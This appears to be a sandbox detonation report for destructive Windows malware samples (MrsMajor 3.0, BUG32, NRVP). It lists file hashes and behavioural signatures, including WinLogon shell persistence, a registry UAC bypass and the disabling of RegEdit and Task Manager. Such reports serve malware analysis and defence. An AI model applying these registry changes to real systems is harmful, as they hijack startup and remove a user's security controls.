| SHA512 | 520ec4a8e9e48c45c8156d09f2bd57aa201e1f2860b1de4a6d461bb7b68bb39f410efeafa0300c0ae8cba33ce65c5608fe440d35d8f00c1608e2715c1be2a8f9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Visited Links
| MD5 | cf0d2cd114d283f53f66adc2d432692c |
| SHA1 | bb46261419dfd72b7a7db4f7597e53754ec3a704 |
| SHA256 | 07d2ece92db9f030986eabb0bd965cf6cb0b5eab1a3df0bd6c2f5a6abd6573e4 |
| SHA512 | a46acf6af88aa1a109b7aba3018a0d97927e30a129f8c100ed0d227e3a67752a86148ee0109f1db1d96e0868e98a8d5d2f061a1fa8615d320ef42387efe4ed89 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Favicons
| MD5 | eb4805dafab2cbd7b5719ddeb5c54745 |
| SHA1 | ac92246b6f5dde4b53f78f144cbdfee328c9b0d9 |
| SHA256 | 17e3ba073a9a7cfdae3a53abec6f10ab7de2f5e0812e3d82d470ec4e6c0cd65e |
| SHA512 | 80308113831c74252139796909b7c7abe3973b3add4a6340fc7c827b7163276ba58eecb9925c3dd2b7b940abedfa7e5f6e06b5000648fc4aeb41f092bb0d628a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
| MD5 | 9eae63c7a967fc314dd311d9f46a45b7 |
| SHA1 | caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf |
| SHA256 | 4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d |
| SHA512 | bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8 |
\??\pipe\crashpad_1744_ZMQSPUMWYUZACTUR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 87a6e0df6e7691d2ffd08bd087209db8 |
| SHA1 | 256803e8e7c7679d16674baa5ebed4b521c4ae64 |
| SHA256 | 3ec6a236d2f1b675d76d7395de28d740f641457b80e694f3dfcbb9107593562d |
| SHA512 | 8ed1a03837c573772f8239677ec6b992e3bb6405f9a540a633e754f0bbb229a16cfb63a4543fb9f49c5b3140a338108b215ee9045f3e68889817fe7de86cfac9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
| MD5 | b7cc678973c9f56ef316f54f354f34ac |
| SHA1 | 1a5c26f87472385310f54eb86277dd8a6bf0a8a2 |
| SHA256 | 2bd8bd2d3c71911ea98a643399b084af2dfe092a20e7bf8dfd838ed2bae5bf2a |
| SHA512 | d8662ff47daa08602b3007d2cfabe948a2a642291c4b64ec9352ce3d75c52910472ccff4b1ebc10d12b8a9151c941e9d1295a775dc9ffce20249c68eddf16cb6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | 6801e9b829592ab0f760220a4822e491 |
| SHA1 | 2520742b432121ba6422285a9b5a244f34e847f2 |
| SHA256 | af504462f020aff63c0e95f8920ca0da968a5595f28f253a204d452eb9931939 |
| SHA512 | 0f3711c7733a5ace2c7085d0fdc7d4e4bec2dd58c8be003297295094ece2be19b8981ea2d3ccb46e418474117341800f668d198ccd973b30be1fbb05b635f3e7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13325705976274400
| MD5 | 87b5690e0a2f3951271480f71a92a3a6 |
| SHA1 | dcc332d6bb25eea441d2cc85dca8c8320dfa5707 |
| SHA256 | 857521d29d2001f2d776f2680e3c08af993988a246df9fa188f50c9799834ff0 |
| SHA512 | 7cd442a219aeb35ec99aa1effd6be5df2998d1f320f4b2ef90c040fed3cea1124a9eb18c1e880059899be848c06b0a376b38f32b336e86c64b668606900e1c68 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000004
| MD5 | 63d832bd47d6e550eaef754596d8fdaa |
| SHA1 | 3b11fd4048f84fe5143057e7e90a42c4220e1807 |
| SHA256 | 4dd9ab33b9f8a5aa6b190ee3a88133be4d10b5dfdeff0c3ca060b825ff6420dd |
| SHA512 | 586287b26249591e5ae5ba0847bfcb3c3c4bbfb0cef433ecfb2052bbf0f37527bb72ddc57447c37c6879f50a28c96575b911fd121c3f145a061ff57ccacf479c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
| MD5 | 4b25cdc9ef1fafdf0ebdcc7c933271d9 |
| SHA1 | ad93e5afe1445d7cf73bd24ac71d9a07e68b065b |
| SHA256 | 75f670a6c3441a4d79285cbb422c51c18497e4d5a26b97da40613ae262c794ae |
| SHA512 | 67e2045de7d07679d80f547435c6d86a796e7735caa93df294c4a416d1d380dba3dfb4e2932b40e3abb52a84a7d34026ca0936733244854063ea81ce8b2c2f5d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\MANIFEST-000004
| MD5 | f3a604cc1687a04eaabc91b49ed90eac |
| SHA1 | 507d0c1334e11f23da43bb9c8702652511893d03 |
| SHA256 | 628a12f2ebfd6d19731a8a362956c95803f1d909293f6936542fb458d8be1a39 |
| SHA512 | a49c1632af45f2a938c2752aeb67e254e92a04bff91affe95952ba7960a60ec143639565790898d55a5ac4d5eb34c2dab1b93e295840d4e30cf3b16d913a7806 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000006.log
| MD5 | 0ef5856e088c86185689e72d5b753891 |
| SHA1 | 91d1707366150d8ac09ac36b2ca51273852d1fb8 |
| SHA256 | b66747ededda687302c0a14667be75a4e65334b793e3efc35263dd042c17fe06 |
| SHA512 | d4057b8618e7f3d4a6d8f6180da5d6440cbdb529a28b6b5062b3beac202b46d57ef4587e658f6f84aab4dee2e9bfd7101c36bc2cf210034be5f2685cc8e2ed7e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data
| MD5 | e3f8eacbe446cd3867ef59e29d5b99d5 |
| SHA1 | 275d77cf4986fe6d2487c6127b829240450e3638 |
| SHA256 | 6392fa8eb1c58d6b4211ab34d2d6e96b77533eb3ea9127de55e0f308e3273621 |
| SHA512 | 4334ab3237f2de0f4fd139b728466b0aeb6e4881183da35ab6834272de90924e761cde4406bd893eee98104b9fafa69bfd8dfdf5a878bddec7224a143b734afe |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000005.ldb
| MD5 | fe382e791274914bee5950777e4f1fd3 |
| SHA1 | 53b523b5fc87e66f2520a0b5f9ea080072668f4d |
| SHA256 | 935d36c021d0e08a5648c622f3f6fde376e3310013680ae598c0e22dc943d132 |
| SHA512 | a5f608fb4f0a1dbc4c5d1b739b1a5b6f50cac1d6a61312b19abf9f601882a291d73524ac55bbe183e4e64db8dcc203d4bf3cedc734fd04bd448cb825d98d1e67 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000005.ldb
| MD5 | 0d30bb8b60f3c477b7f5bee76de87a5e |
| SHA1 | 754db054cc38503c0a7b261489b25208749dce50 |
| SHA256 | 7d66803b525484d42d0699ed1a2370028b7aa21ce173ea3cb9331cb80d01b695 |
| SHA512 | fb43e45b6676ea12643127731a1d3fcd783c16b4b6aba0d31ea93af19020248d766ea877a7abfdfe484e70bd4c2ed8d66f44ac2c3da38885b3edbad41ef68c43 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | a8195b966ce09a0663f296ec80a80f4f |
| SHA1 | 8b7b2e8ced1f95228cfe2d35964c1d7c0a493376 |
| SHA256 | a868906ce582994c5c4e956154a3ce4da0d1b8b7eaaac68686aaa334a7df67e0 |
| SHA512 | 82168a47087daaaa784733ccc7ae0d10bce438356da7a9dd46296a60b91edecb979c551bcd90ce5ff21ee92fec3d09544d81635307697a847faa47d73b76795b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
| MD5 | a8195b966ce09a0663f296ec80a80f4f |
| SHA1 | 8b7b2e8ced1f95228cfe2d35964c1d7c0a493376 |
| SHA256 | a868906ce582994c5c4e956154a3ce4da0d1b8b7eaaac68686aaa334a7df67e0 |
| SHA512 | 82168a47087daaaa784733ccc7ae0d10bce438356da7a9dd46296a60b91edecb979c551bcd90ce5ff21ee92fec3d09544d81635307697a847faa47d73b76795b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\MANIFEST-000004
| MD5 | 494e626a5079642efed0f0c7f38bd4ef |
| SHA1 | 0cbead74a33ad551eae3b25c213d3b080535589b |
| SHA256 | 9ce8bd68fe0b86c0bf2067d549e7b93bc1c24f12bdfd227aba521e9d7e704436 |
| SHA512 | 659bc9699799757dec5b257d78949d378caf03001890f7ae24d28055cff7175d85f8ea14393048aab1c0ba460082f568e5f4bfacdb8921f006f98989293fe78d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG
| MD5 | c193c89004caefaa9f692ade5cf79669 |
| SHA1 | d4325bd5838a15a22a8913e7f5c50bdace9371db |
| SHA256 | d0fb7b962090651cdd3c02e077d30d3d1509972ba932e4b3ff5e5f2d13605406 |
| SHA512 | 70aac6d5c01c6781329558567842f0bae47f0e16bf7e42a02bb10db69c4070f3b6c108de34c276c78c3bf07ae58e8ac3d328f64ab10b969d8f1e0c1b07fcc40e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000004
| MD5 | 494e626a5079642efed0f0c7f38bd4ef |
| SHA1 | 0cbead74a33ad551eae3b25c213d3b080535589b |
| SHA256 | 9ce8bd68fe0b86c0bf2067d549e7b93bc1c24f12bdfd227aba521e9d7e704436 |
| SHA512 | 659bc9699799757dec5b257d78949d378caf03001890f7ae24d28055cff7175d85f8ea14393048aab1c0ba460082f568e5f4bfacdb8921f006f98989293fe78d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
| MD5 | f7eb49dfdf4de91cce870951148b6d05 |
| SHA1 | 67960d711b385a0fa02e736e62f5cf9b72fe926d |
| SHA256 | 135174a000c2bd536e2acb564ad9e30e214f793592d28d6d40c099c0cc01110e |
| SHA512 | 6142f84ab2ae992966c80902b1ea542436bf11bfbcdb6042cf1b40def61ca2f7d5f0274558f21971d1f042db2f5e9c55a3fb41886caae1078c5db51f9b13cdc4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000006.log
| MD5 | abc68088260f9653781970b93fd215e5 |
| SHA1 | 4b5927ce79726f93af8008cde41c28c3ce9c3f27 |
| SHA256 | 0b3bc95ecea894463c0be1a1954c0ec2e6f6b327c3706f0c33df542f5b3e3909 |
| SHA512 | ecf7ba72bd70ecf8e33978b1596e612a95440a0dc303604e8bb9688c3481865a27700679d42ce5a3150ac8cc0b4941b5eff91b76b14e97b5f3a20a2b22eb223a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\MANIFEST-000004
| MD5 | be2a12b06745bb5de6254b2592d8ab20 |
| SHA1 | 19a3dc035140689628e54095af6c4b4dae44b55d |
| SHA256 | 29e140732c7fc2d81fb1f506cc94386ce55f27446f9277e66236080cdf6f5944 |
| SHA512 | fad84027f46c0d4e4fb0357c15d77f7a86c941042ce538e0e89e5b8c477ed3cb46e262e3a3da186eadbb266c9288965c7299b4dc2a7ae1b346230dc48a7ecdba |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG
| MD5 | 6656eb0953fb6201ca32840d3bafd834 |
| SHA1 | aa833368375bee824c4d98ae60149822a62e1a33 |
| SHA256 | b1f46cd4d5ee6a01b8c6bdc56634950e48976293f9ec9f9d24304b53770a9544 |
| SHA512 | 6195bf58a6336469575a325e8014f8c5ebf9ac598bfab8984c6b8935a1e7f50b408d3e00a97087cf07024f792c89ea686c56bf00cb73c32e49652fd00caf3841 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\9995baa7-161c-4e02-bacd-115c42c6b269.tmp
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\316aff10-20f1-45c0-93a1-f69f7dc496fb.tmp
| MD5 | 415a4d23a6978b339a2cd97dbe71681d |
| SHA1 | 49469f9c724b42948645ffcbc3abe22aa49b7c3a |
| SHA256 | ba0adfd5a725fc4c7b2e9b1cac5b15dbfea51307db88650004d1a4cc62fc69ff |
| SHA512 | 7f619510276cd184cf88436e8366570682317170502526ee6d3c4689626ecb9258709aa98287652afc8ed4640a435ccc916aacb94faea65762d0d6a9af80a168 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | cad631520208bb7e57c3733266c54ff7 |
| SHA1 | b28855b330c04c0970858fddfc1ea6e123e8a14e |
| SHA256 | 6464d82abef2fca4611a1ff7789b07ee892bfdce9c62e72962a4c42cec99e23f |
| SHA512 | 4291d0d2b5adebe523c8d47df04364a26f140b7815cfd27bf8df097a56f4412a75cee828409b9c9395c02bf87a893630670fc899855fcef2c8838226e1c3dd18 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f6647636c68f9fad6bc9111f3bc47f45 |
| SHA1 | 61ea9204e29ffaef366de9fa1c014464d55a0da0 |
| SHA256 | 385e7035240f92894a7ec8a38b2e5dda451a894822109ce9f452c8fa033ab8a9 |
| SHA512 | 71bf5e52910ce6d169d0d8b69fa886a90296762f2f76a651c9d5f9e87a391adf50529a34f1c71fd34a245ebd40b547082e8ec3ac6c791d21eb2d2a0973d2695d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 569893fa85a19baf39077d444af504db |
| SHA1 | ee627814ee049e4a4fff547cb622e4855ec18ad6 |
| SHA256 | 37cbfc27c7593ffb4a2218f7f332d69c2121c486fb8a4be2d064f91bdec9d77e |
| SHA512 | 753b6ec900a12f04b743b52a5c5715cab5ec9cc4c4b4257bef65428535da6972fd3c2fd7f24678765bd643b26c38d4f6d431856fa9c5963abac10d7d5883903f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\b5b079a5-d8ac-4bb9-998a-14ecd622802f.tmp
| MD5 | b4c8a47ce1600709ec054ac1b1ee246d |
| SHA1 | e7b7d6005791c4d26ddbc297f80da5a77d96cbf8 |
| SHA256 | 45e440c8988408190affd1d088646d98663a383fbb569cb54d4cbb34afdcba00 |
| SHA512 | 13c9af99a38f152e605e0014be6635a5c8b9f116ffc4f28cf62cafd818ec90bcf4e7abd0a7f5171af08c8baf05caf260b16a23593ffd9af7245165b7386ff2fa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | cbb4115576324cadd72aeca410ae4550 |
| SHA1 | 84a746466683431784588992e1599c84d702e8b6 |
| SHA256 | 8782b3b539c8f4669bc37930acf79f0eaab61503277c5a8c8c6945fb250efa8b |
| SHA512 | a79014d74fbbf842fb9d1cbca39335445101f3ea31f2612265850eac4dd1d3e7b286a89eb9763db781a947aaa2a91f4d03ebd1ef36120c59c4377749440f1c73 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c907a40a633bc169a50607ed0b8a056a |
| SHA1 | 60f227ec4a1e4ec76786bd47ac7708b837c8a8c9 |
| SHA256 | 7ba9bc014a32d4352635f978882cc25f3b3a8604d0932f208aaaf93cd52ef475 |
| SHA512 | 5b6f5339546d17d49eecd5f11d5d4bd15f6ad7245cf8eb33c5ba55436f01a9af041f26e87714926097c9ca4f65abf212fa19e6c27a1a94afe3963ff6645445e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | becad68ad3185d34062becea8aad57e9 |
| SHA1 | 849151351ce0da594de802008c979262aeae5bf3 |
| SHA256 | e215ca362b8c5dc0877a022a3789f93f16f4619de7bd55504c3fb7a4192ea6e0 |
| SHA512 | c38d1995aa9e5fee2b90486b54e20fecf0677c57059a33d5107fafb2158c1a0bf28d0fad3872857137a099443ad472545c053b2a852c3cda95b0d872506c3121 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 637beaf4cc43923e347f5516da7e7143 |
| SHA1 | 245ebe8cb765552285f464f9ac626a172547133f |
| SHA256 | e40276343c135e6fb31218ef56177bda1809ebde0084c6770df7c4750e0081ad |
| SHA512 | d3c389272aa5bbcb5ff346a00ae249ae7c5f28ea3f022589a2a4abc6efa79bc68944140c1a04c9be8172596962ad2a2db8a52273b9c89d55a9cddb74fa83bf14 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\453be044-f923-4ea8-a8a4-39f129acf4bc.tmp
| MD5 | 129d1119b461f8f062e981bad5445893 |
| SHA1 | b6e2d0099a95b5de21f33020ea145f3bd121cf95 |
| SHA256 | a69ab2c0aded70ecd767440f32a53c580d6aa3bde9f12ce1d7f6aa4c837105c4 |
| SHA512 | 7a7e9c25b6cc674227c033ef0e1c16b5833151febe727d02803242ed4af70f101fe17bebe32dd7ae3b784669138600b7aa10ce9e54b6f151af5c837128d3d439 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | eeff53718579d8c991482cec46180512 |
| SHA1 | 05849edc56375b78342a7869dd11c46ae8a8d2f2 |
| SHA256 | 54031023201514750facb9d51a1afe46fbfa98aafad1c065be58883f89019a7c |
| SHA512 | e996ea98bbde034ee77cfe01c14b1c45410b6cf48ef00edc1568264d8106c47feda52fc61bd5910001b4f893c4f40a9bebe839642f90dbb1a666d2f67847dfba |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 4871df2ff0ae92dd64e9bd7774d6e587 |
| SHA1 | 5e0a2745bec62978901dda63effdaeae320b299b |
| SHA256 | f62e03e4c2826ba4771986d6f17fe182aaa2269fd9958fba0aafeb6613af7da3 |
| SHA512 | cf327e492f7070dfc4e31e5173e79db109cc62d1796e45e9e5bc9053d0db79558285581825c6dac12a4ecea04569fb03abc8d8a0c6d73143ef5e78b346e6aeb0 |
Analysis: behavioral3
Detonation Overview
Submitted
2023-04-11 14:43
Reported
2023-04-11 14:57
Platform
win10v2004-20230220-en
Max time kernel
730s
Max time network
804s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\bug32\\runner.vbs\"" | C:\Windows\System32\wscript.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\wscript.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools = "1" | C:\Windows\System32\wscript.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\RestartEnter.tiff | C:\Windows\System32\wscript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MrsMajor 3.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\NRVP.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MrsMajor 3.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\BUG32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\NRVP.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\MrsMajor 3.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DDDB.tmp\eulascr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\MrsMajor 3.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4A8F.tmp\eulascr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\BUG32.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DDDB.tmp\eulascr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4A8F.tmp\eulascr.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico" | C:\Windows\System32\wscript.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\desktop.ini | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\Favorites\desktop.ini | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\Links\desktop.ini | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\Music\desktop.ini | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\Pictures\desktop.ini | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\Videos\desktop.ini | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\Desktop\desktop.ini | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\Documents\desktop.ini | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\OneDrive\desktop.ini | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\Saved Games\desktop.ini | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\Searches\desktop.ini | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\3D Objects\desktop.ini | C:\Windows\System32\wscript.exe | N/A |
| File created | C:\Users\Admin\Contacts\desktop.ini | C:\Windows\System32\wscript.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\G: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\cmd.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\cmd.exe | N/A |
